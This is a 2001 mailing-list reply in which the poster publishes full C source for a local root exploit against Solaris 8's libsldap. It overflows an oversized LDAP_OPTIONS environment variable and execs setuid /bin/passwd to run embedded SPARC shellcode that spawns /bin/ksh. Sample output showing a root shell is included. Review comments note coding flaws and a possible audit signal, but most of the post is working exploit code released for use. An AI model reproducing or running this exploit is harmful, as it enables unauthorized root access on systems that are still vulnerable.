Re: Solaris 8 libsldap exploit

From: Fyodor (fygraveat_private)
Date: Thu Jul 05 2001 - 12:59:45 PDT


    On Thu, Jul 05, 2001 at 02:14:09PM +0300, Noir Desir wrote:
    > 
    > Exploit is plain simple, tested on an Ultra10 and an Enterprise 3500 with
    > success.
    > I usually support the anti-sec movement but I got my reasons to publish
    > the exploit.
    > If you want to know why, please do mail me.
    > 
    
    
    *hmm*.. kids, then let's publish another one as well ;-D
    
    #include <stdlib.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <string.h>
    
    
    /* $Id: ldap_exp2.c,v 1.1 2001/06/27 23:01:04 fygrave Exp $
     *
     * victim% ./lod -s 316 -p 5
     * jumping into: ffbefe74 (buf size: 156, soff: 316, stack: ffbefd38)
     * # id
     * uid=0(root) gid=200(em) egid=3(sys)
     * # uname -a
     * SunOS victim 5.8 Generic_108528-06 sun4u sparc SUNW,Ultra-60
     * # ^D
     * victim%
     * Thu Jun 28 05:22:38 ICT 2001
     * Fyodor <fygraveat_private>
     */
    
    /* Layout constants for the environment string built in main().  NOP is a
     * 4-byte filler pattern that main() copies NOPS times; BUFSIZE, PAD and
     * SOFF are the defaults behind -b, -p and -s.  LOCALBUF is the size of the
     * static build buffer; nothing checks the -b/-p values against it. */
    #define NOP "\x80\x1c\x40\x11"
    #define BUFSIZE 156
    #define LOCALBUF 10000
    #define NOPS     1964
    #define PAD 3
    #define SOFF 664
    
    /* Payload bytes appended to the environment string after the NOP run
     * (strcat in main).  The per-line comments are the author's disassembly;
     * the trailing "/bin/ksh" text is referenced by the instructions above it. */
    char shellcode[]=
    
    "\x90\x1a\x40\x09"  /*  xor  %o1, %o1, %o0 */
    "\x82\x10\x20\x17"  /*  mov  0x17, %g1 */
    "\x91\xd0\x20\x08"  /*  ta  8 */
    "\x20\xbf\xff\xff"  /*  bn,a   0x108b4 <main+8> */
    "\x20\xbf\xff\xff"  /*  bn,a   0x108b8 <maino> */
    "\x7f\xff\xff\xff"  /*  call  0x108bc <shellcode> */
    "\x90\x03\xe0\x30"  /*  add  %o7, 0x30, %o0 */
    "\x92\x03\xe0\x28"  /*  add  %o7, 0x28, %o1 */
    "\xc0\x2b\xe0\x38"  /*  clrb  [ %o7 + 0x38 ] */
    "\xd0\x23\xe0\x28"  /*  st  %o0, [ %o7 + 0x28 ] */
    "\xc0\x23\xe0\x2c"  /*  clr  [ %o7 + 0x2c ] */
    "\x82\x10\x20\x0b"  /*  mov  0xb, %g1 */
    "\x91\xd0\x20\x08"  /*  ta  8 */
    "\x82\x10\x20\x01"  /*  mov  1, %g1 */
    "\x91\xd0\x20\x08"  /*  ta  8 */
    "\x41\x41\x41\x41"  /*  AAAA */
    "\x41\x41\x41\x41"  /*  AAAA */
    "\x2f\x62\x69\x6e"  /*  /bin */
    "\x2f\x6b\x73\x68"  /*  /ksh */
    "\x41\x57\x68\x6f";  /*  junk */
    
    /* Current option argument set by getopt(3).  <unistd.h> is included above
     * and presumably already declares this, so the line is likely redundant. */
    extern char *optarg;
    
    /* Return the caller-visible stack pointer.  The inline asm copies %sp into
     * %i0 and there is no C return statement, so the value presumably relies
     * on the SPARC register-window convention that %i0 carries a non-leaf
     * function's return value.  In C terms a non-void function whose value is
     * used falling off the end is undefined behavior, so this is compiler- and
     * optimization-level dependent. */
    unsigned long get_sp(void) {
    
           __asm__("mov %sp,%i0 \n");
    
    }
    
    /* Build one oversized LDAP_OPTIONS environment entry and exec /bin/passwd
     * with it.  Layout of buf, in order: "LDAP_OPTIONS=", bufsize bytes of 'A',
     * the 4-byte addr written twice, pad bytes of 'A', NOPS copies of the 4-byte
     * NOP pattern, then shellcode.  With the defaults that is roughly 8 KB in a
     * single variable.  NOTE(review): a single environment entry of that size
     * handed to a setuid program is the observable that an audit rule or a
     * hardening check for such programs can key on.
     * Options: -b buffsize, -s stackoff, -p pad; -h (or any other option)
     * prints usage and exits with status 1. */
    int main(int argc, char **argv) {
    
        static    char buf[LOCALBUF], *ptr;
        unsigned long addr, bufsize, soff, pad;
        int i, c;
    
        /* Defaults come from the #defines above. */
        soff = SOFF;
        bufsize = BUFSIZE;
        pad = PAD;
    
        /* strtoul() results are not validated: a malformed value silently
         * becomes 0, and nothing checks that bufsize and pad keep the writes
         * below inside LOCALBUF. */
        while((c = getopt(argc, argv, "s:b:p:h")) !=EOF) 
            switch(c) {
                case 'b':
                    bufsize = strtoul(optarg,NULL,0); 
                    break;
                case 's':
                    soff = strtoul(optarg,NULL,0); 
                    break;
                case 'p':
                    pad = strtoul(optarg,NULL,0);
                    break;    
                case 'h':
                default:
                    fprintf(stderr,"usage: %s [-b buffsize] [-s stackoff] [-p pad]\n",
                    argv[0]);
                    exit(1);
            }
    	
        
        /* Clearing the whole array is what keeps buf NUL-terminated for the
         * strcat() below after the raw writes. */
        bzero(buf, sizeof(buf));
    
        strcpy(buf,"LDAP_OPTIONS=");
        ptr=buf + strlen(buf);
        
        /* Filler run; i is int and bufsize unsigned long, so i is promoted to
         * unsigned for the comparison.  No bound against LOCALBUF. */
        for(i=0;i<bufsize;i++, ptr++) *ptr='A';
    
        /* addr is this process's stack pointer plus the -s offset.  memcpy copies
         * the first 4 bytes of its object representation in host byte order
         * (the whole value only on a 32-bit build — presumably the intended
         * target), and places it twice back to back. */
        addr = get_sp() + soff;
        memcpy(ptr,(char *)&addr, 4);
        memcpy(ptr+4,(char *)&addr, 4);
        ptr+=8;
    
        for(i=0;i<pad;i++, ptr++) *ptr='A';
        for(i=0;i<NOPS;i++, ptr+=4) memcpy(ptr, NOP, 4);
        /* Appends at the first NUL after the NOP run, i.e. directly behind ptr
         * as long as the writes above stayed short of the end of buf. */
        strcat(buf, shellcode);
    
        /* The entry is inherited by the exec'd program.  %i with unsigned long
         * arguments is a format/argument mismatch (undefined behavior); %lu is
         * the matching conversion. */
        putenv(buf);
        fprintf(stderr,"jumping into: %lx (buf size: %i, soff: %i, stack: %lx)\n",
            addr, bufsize, soff, get_sp());
    
        /* On success this never returns; if execl() fails, main falls off the
         * end without any diagnostic. */
        execl("/bin/passwd","lameswd",0);
    }
        
    -- 
    http://www.notlsd.net
    PGP fingerprint = 56DD 1511 DDDA 56D7 99C7  B288 5CE5 A713 0969 A4D1
    


